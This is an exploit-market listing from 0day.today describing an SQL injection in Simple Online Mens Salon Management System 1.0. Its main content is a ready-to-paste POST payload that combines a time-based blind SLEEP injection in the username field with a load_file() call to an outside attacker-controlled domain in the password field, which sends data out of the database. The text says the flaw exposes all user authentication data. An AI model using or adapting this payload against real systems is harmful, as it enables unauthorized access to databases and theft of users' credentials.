[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Simple Online Mens Salon Management System 1.0 SQL Injection Vulnerability

Author
nu11secur1ty
Risk
[
Security Risk High
]
0day-ID
0day-ID-37101
Category
web applications
Date add
06-12-2021
Platform
php
Simple Online Mens Salon Management System 1.0 SQL Injection Vulnerability

## [MSMS](https://www.sourcecodester.com/php/15069/simple-online-mens-salon-management-system-php-free-source-code.html)

## [Vendor](https://www.sourcecodester.com/users/tips23)

![](https://github.com/nu11secur1ty/CVE-nu11secur1ty/blob/main/vendors/oretnom23/MSMS/docs/Screenshot%202021-12-04%20175708.png)

## Description
The `password` parameter on MSMS 1.0 appears to be vulnerable to SQL
injection attacks. The predictive tests of this application interacted
with that domain, indicating that the injected SQL query was executed.
The attacker can retrieve all authentication and
information about the users of this system.

## Payload

```mysql
---
Parameter: username (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: username=hacked' AND (SELECT 5469 FROM
(SELECT(SLEEP(5)))kYFm) AND 'eRWi'='eRWi&password=y3L!z9j!P2'+(select
load_file('\\\\525cg9hmf4ujg32elolcrk29s0yumlq9hc54svgk.nu11secur1typenetrationtestingengineer.net\\maq'))+'
---
```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/edit/main/vendors/oretnom23/MSMS)

## Proof and Exploit:
[href](https://streamable.com/fvwqq2)

#  0day.today [2024-03-28]  #